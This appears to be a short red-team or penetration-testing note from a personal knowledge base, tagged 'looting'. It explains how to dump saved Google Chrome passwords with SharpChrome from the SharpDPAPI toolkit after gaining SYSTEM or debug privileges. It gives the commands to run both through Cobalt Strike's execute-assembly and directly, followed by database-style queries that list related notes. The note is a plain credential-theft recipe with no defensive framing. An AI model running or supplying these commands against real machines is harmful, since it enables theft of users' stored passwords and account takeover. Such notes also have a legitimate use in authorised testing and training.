Dump Google Chrome Passwords using
SharpChrome.exePrerequisites
- Debug Privileges Obtained (ex:
NT_AUTHORITY/SYSTEM)- Clone and Build: https://github.com/GhostPack/SharpDPAPI
With Cobalt Strike
execute-assembly SharpChrome.exe loginsWithout Cobalt Strike
SharpChrome.exe logins`
Related
Related Notes
All Related Notes
TABLE file.ctime as "Created", tags as "Tags" FROM "New Notes" WHERE contains(tags, "windows") OR contains(tags, "looting") SORT file.ctime DESCwindows
TABLE file.ctime as "Created", tags as "Tags" FROM "New Notes" WHERE contains(tags, "windows") SORT file.ctime DESClooting
TABLE file.ctime as "Created", tags as "Tags" FROM "New Notes" WHERE contains(tags, "looting") SORT file.ctime DESC